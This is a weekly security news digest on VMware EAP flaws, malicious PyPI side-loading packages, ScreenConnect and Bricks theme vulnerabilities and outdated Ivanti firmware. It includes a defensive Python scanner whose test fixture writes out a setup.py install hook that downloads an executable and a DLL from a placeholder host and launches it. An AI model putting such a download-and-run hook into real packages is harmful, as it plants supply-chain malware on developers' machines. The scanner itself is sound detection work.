Programmer’s Digest #71
02/14/2024-02/21/2024 VMware Alert, New Malicious PyPI Packages, Critical Flaws in ConnectWise ScreenConnect Software And More.
1. VMware Alert: Uninstall EAP Now – Critical Flaw Puts Active Directory at Risk
VMware advises uninstalling the deprecated Enhanced Authentication Plugin (EAP) due to a critical security flaw (CVE-2024-22245, CVSS score: 9.6), described as an arbitrary authentication relay bug. This flaw could enable a malicious actor to manipulate service tickets for arbitrary Active Directory Service Principal Names (SPNs) through a user’s browser. Also discovered is a session hijack flaw (CVE-2024-22250, CVSS score: 7.8) in EAP, allowing a local actor to seize a privileged session. Users connecting to VMware vSphere via the vSphere Client on Windows systems may be affected. VMware will not patch these flaws, recommending complete removal of the plugin. Meanwhile, SonarSource disclosed cross-site scripting (XSS) flaws in Joomla! (CVE-2024-21726), addressed in versions 5.0.3 and 4.4.3, posing a moderate threat.
2. New Malicious PyPI Packages Caught Using Covert Side-Loading Tactics
Cybersecurity researchers found two malicious packages on PyPI using DLL side-loading to evade detection and execute harmful code. Named NP6HelperHttptest and NP6HelperHttper, they were downloaded 537 and 166 times before removal. This discovery underscores the expanding threat of software supply chain attacks. The NP6 reference connects to a legitimate ChapsVision marketing solution, with the fake packages mimicking the legitimate tools NP6HelperHttp and NP6HelperConfig. Their goal is to deceive developers into downloading rogue versions. These packages contain a setup.py script designed to download an executable vulnerable to DLL side-loading (“ComServer.exe”) and a malicious DLL (“dgdeskband64.dll”). The DLL aims to avoid detection, similar to previous cases like the npm package “aabquerys,” which deployed a remote access trojan. It communicates with an attacker-controlled domain to fetch malicious code, potentially part of a broader campaign targeting supply chain security in open-source repositories.
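The install-time behaviour described above (a setup.py that fetches a Windows executable and a DLL from a remote host) is something a package-review pipeline can flag statically before anything is installed. The following is an added example, not code from the digest or from the researchers it cites: it parses a setup.py with Python's `ast` module and reports network fetches, process execution, references to `.exe`/`.dll` files, and custom setuptools command classes (the usual hook for running code during `pip install`). The two setup.py texts it inspects are constructed fixtures; the hostname `example.invalid` and the package names are placeholders, and the script only parses the text, it never runs it.

```python
"""Static triage of a PyPI sdist's setup.py for install-time download-and-drop behaviour.

Added example (not the digest's or any researcher's code). It walks the AST of a
setup.py and reports patterns that a legitimate pure-Python package rarely needs.
"""
import ast
from typing import List

# Call names that commonly fetch remote content at install time.
NETWORK_CALLS = {"urlretrieve", "urlopen", "get", "post", "download"}
# Call names that execute a file or spawn a process.
EXEC_CALLS = {"run", "Popen", "call", "check_output", "check_call", "system", "startfile"}
# setuptools command classes that run arbitrary code during installation.
COMMAND_BASES = {"install", "develop", "build_py", "egg_info"}
BINARY_SUFFIXES = (".exe", ".dll")


def _call_name(node: ast.Call) -> str:
    """Return the bare name of the function being called (e.g. 'urlretrieve')."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""


def _base_name(node: ast.expr) -> str:
    """Return the bare name of a class base expression."""
    if isinstance(node, ast.Attribute):
        return node.attr
    if isinstance(node, ast.Name):
        return node.id
    return ""


def _string_literals(node: ast.AST) -> List[str]:
    """All string constants nested anywhere under `node`."""
    return [n.value for n in ast.walk(node)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)]


def triage_setup_py(source: str) -> List[str]:
    """Return human-readable findings for suspicious install-time behaviour in `source`."""
    findings: List[str] = []
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                if _base_name(base) in COMMAND_BASES:
                    findings.append(
                        f"line {node.lineno}: custom setuptools command class {node.name} "
                        f"(runs code at install time)")
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            literals = _string_literals(node)
            # A fetch is only flagged when a literal URL is passed to a network-style call.
            if name in NETWORK_CALLS and any(s.startswith(("http://", "https://")) for s in literals):
                findings.append(f"line {node.lineno}: network fetch via {name}()")
            if name in EXEC_CALLS:
                findings.append(f"line {node.lineno}: process execution via {name}()")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.lower().endswith(BINARY_SUFFIXES):
                findings.append(f"line {node.lineno}: references Windows binary {node.value!r}")
    return findings


# Constructed fixture mirroring the pattern in the digest: a post-install hook that
# downloads an executable and a DLL. Placeholder host; this text is parsed, never executed.
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import os, urllib.request, subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        target = os.path.join(os.environ["TEMP"], "ComServer.exe")
        urllib.request.urlretrieve("https://example.invalid/ComServer.exe", target)
        urllib.request.urlretrieve("https://example.invalid/dgdeskband64.dll",
                                   os.path.join(os.environ["TEMP"], "dgdeskband64.dll"))
        subprocess.Popen([target])

setup(name="example-pkg", version="0.0.1", cmdclass={"install": PostInstall})
'''

# Constructed benign control: a project URL is a string literal but not a fetch.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="example-clean", version="1.0", packages=["example_clean"],
      url="https://example.invalid/project")
'''

if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        print(f"== {label} ==")
        for finding in triage_setup_py(text) or ["no findings"]:
            print(" ", finding)
```

This is a triage aid rather than a verdict: attackers can obfuscate names or build URLs at runtime, so an empty result does not clear a package, while any hit is a reason to inspect the sdist by hand before it reaches a build host.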
3. Critical Flaws Found in ConnectWise ScreenConnect Software – Patch Now
ConnectWise issued updates for its ScreenConnect remote desktop software to fix two security flaws, one critical allowing remote code execution. The vulnerabilities, lacking CVE identifiers, include authentication bypass (CVSS: 10.0) and path traversal (CVSS: 8.4). These critical issues affect versions 23.9.7 and below, with fixes in version 23.9.8, reported on February 13, 2024. Although no exploitation evidence exists, self-hosted users are urged to update. ConnectWise will provide updates for versions 22.4 through 23.9.7, but recommends version 23.9.8. Huntress found over 8,800 vulnerable servers and demonstrated an exploit bypassing authentication, emphasizing the need for immediate action.
4. WordPress Bricks Theme Under Active Attack: Critical Flaw Impacts 25,000+ Sites
The Bricks WordPress theme suffers a critical flaw (CVE-2024-25600, CVSS: 9.8) exploited for remote code execution by unauthenticated attackers. Versions up to 1.9.6 are vulnerable, fixed in 1.9.6.1 released on February 13, 2024. The flaw, reported by Snicco on February 10, involves a nonce-related vulnerability in the prepare_query_vars_from_settings() function. Attack attempts started on February 14, with over three dozen detected by Wordfence. The flaw exposes around 25,000 active installations. Users should promptly update to mitigate risks.
5. Ivanti Pulse Secure Found Using 11-Year-Old Linux Version and Outdated Libraries
A firmware analysis of Ivanti Pulse Secure appliances uncovered significant vulnerabilities, highlighting the ongoing challenge of securing software supply chains. The firmware, based on unsupported CentOS 6.4, exposes outdated Linux components dating back over a decade. Threat actors exploit these weaknesses, targeting Ivanti Connect Secure, Policy Secure, and ZTA gateways with various malware. Active exploits include CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893, with Akamai reporting heightened scanning activity for CVE-2024-22024. Exploiting CVE-2024-21893, Eclypsium gained access to the appliance, revealing outdated packages and vulnerable libraries. Notably, Perl remains at version 5.6.1 from 2001, and the Linux kernel at 2.6.32, posing significant risks. Additionally, Ivanti’s Integrity Checker Tool (ICT) exhibits flaws, potentially allowing attackers to bypass detection. Eclypsium emphasizes the need for transparent validation processes to bolster supply chain security amid increasing exploitation attempts.